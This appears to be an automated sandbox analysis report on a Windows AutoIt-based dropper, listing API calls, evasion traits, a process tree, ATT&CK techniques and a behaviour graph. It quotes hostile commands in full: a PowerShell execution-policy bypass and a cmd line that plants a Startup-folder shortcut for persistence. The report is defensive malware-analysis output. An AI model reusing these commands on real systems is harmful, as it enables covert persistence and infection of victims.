Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\InformationCheck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\InformationCheck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\InformationCheck.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3779Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6039Jump to behavior
Source: C:\Users\Public\InformationCheck.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeAPI coverage: 3.4 %
Source: C:\Users\Public\InformationCheck.exeAPI coverage: 4.7 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF6BB19BC70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF6BB1A72A8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1A71F4 FindFirstFileW,FindClose,0_2_00007FF6BB1A71F4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF6BB19B7C0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB162F50 FindFirstFileExW,0_2_00007FF6BB162F50
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF6BB1AA4F8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF6BB1AA350
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1A6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF6BB1A6428
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF6BB1AA874
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF6BB19C7C0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00594005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00594005
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059494A GetFileAttributesW,FindFirstFileW,FindClose,3_2_0059494A
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0059C2FF
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059CD14 FindFirstFileW,FindClose,3_2_0059CD14
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_0059CD9F
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0059F5D8
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0059F735
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0059FA36
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00593CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00593CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_00904005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00904005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_0090494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0090C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0090CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090CD14 FindFirstFileW,FindClose,10_2_0090CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0090F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0090F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0090FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_00903CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00903CE2
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB141D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF6BB141D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000001.00000002.1975598778.000002BB73AE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000001.00000002.1975598778.000002BB73AE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000001.00000002.1975598778.000002BB73AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B0A00 BlockInput,0_2_00007FF6BB1B0A00
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF6BB1237B0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB145BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF6BB145BC0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1932F4 LoadLibraryA,GetProcAddress,0_2_00007FF6BB1932F4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB18D408 LookupPrivilegeValueW,GetProcessHeap,HeapFree,0_2_00007FF6BB18D408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1459C8 SetUnhandledExceptionFilter,0_2_00007FF6BB1459C8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1457E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6BB1457E4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB15AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6BB15AF58
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB168FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6BB168FE4
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0055A354 SetUnhandledExceptionFilter,3_2_0055A354
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0055A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0055A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008CA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_008CA385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008CA354 SetUnhandledExceptionFilter,10_2_008CA354

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB18CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00007FF6BB18CE68
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF6BB1237B0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB199420 SendInput,keybd_event,0_2_00007FF6BB199420
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19D158 mouse_event,0_2_00007FF6BB19D158
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\Public\InformationCheck.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\Public\InformationCheck.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exitJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB18C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00007FF6BB18C858
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB18D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00007FF6BB18D540
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF800000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: T6l6gPxwQU.exe, InformationCheck.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB15FD20 cpuid 0_2_00007FF6BB15FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19DC1C GetLocalTime,0_2_00007FF6BB19DC1C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB182BCF GetUserNameW,0_2_00007FF6BB182BCF
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB162400 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00007FF6BB162400
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB141D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF6BB141D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: InformationCheck.exe, 00000003.00000003.1794342033.0000000005BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00007FF6BB1B3940
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00007FF6BB1B4074
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005A696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,3_2_005A696E
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005A6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_005A6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0091696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_0091696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_00916E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00916E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
2
Native API
1
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS26
System Information Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
211
Masquerading
LSA Secrets31
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials21
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Virtualization/Sandbox Evasion
DCSync3
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528376 Sample: T6l6gPxwQU.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 47 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->47 49 my.cloudme.com 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Sigma detected: Drops script at startup location 2->53 55 Binary is likely a compiled AutoIt script file 2->55 57 8 other signatures 2->57 10 T6l6gPxwQU.exe 2 2->10         started        14 wscript.exe 1 1 2->14         started        signatures3 process4 file5 39 C:\Users\Public\InformationCheck.exe, PE32 10->39 dropped 41 C:\Users\Public\ProfileDetails.ps1, ASCII 10->41 dropped 61 Binary is likely a compiled AutoIt script file 10->61 63 Bypasses PowerShell execution policy 10->63 65 Drops PE files to the user root directory 10->65 16 powershell.exe 14 17 10->16         started        67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->67 20 SwiftWrite.pif 14->20         started        signatures6 process7 dnsIp8 45 my.cloudme.com 83.140.241.4, 443, 49730 PORT80SE Sweden 16->45 33 C:\Users\Public\Details.au3, Unicode 16->33 dropped 22 InformationCheck.exe 4 16->22         started        26 conhost.exe 16->26         started        file9 process10 file11 35 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 22->35 dropped 37 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 22->37 dropped 59 Drops PE files with a suspicious file extension 22->59 28 cmd.exe 2 22->28         started        signatures12 process13 file14 43 C:\Users\user\AppData\...\SwiftWrite.url, MS 28->43 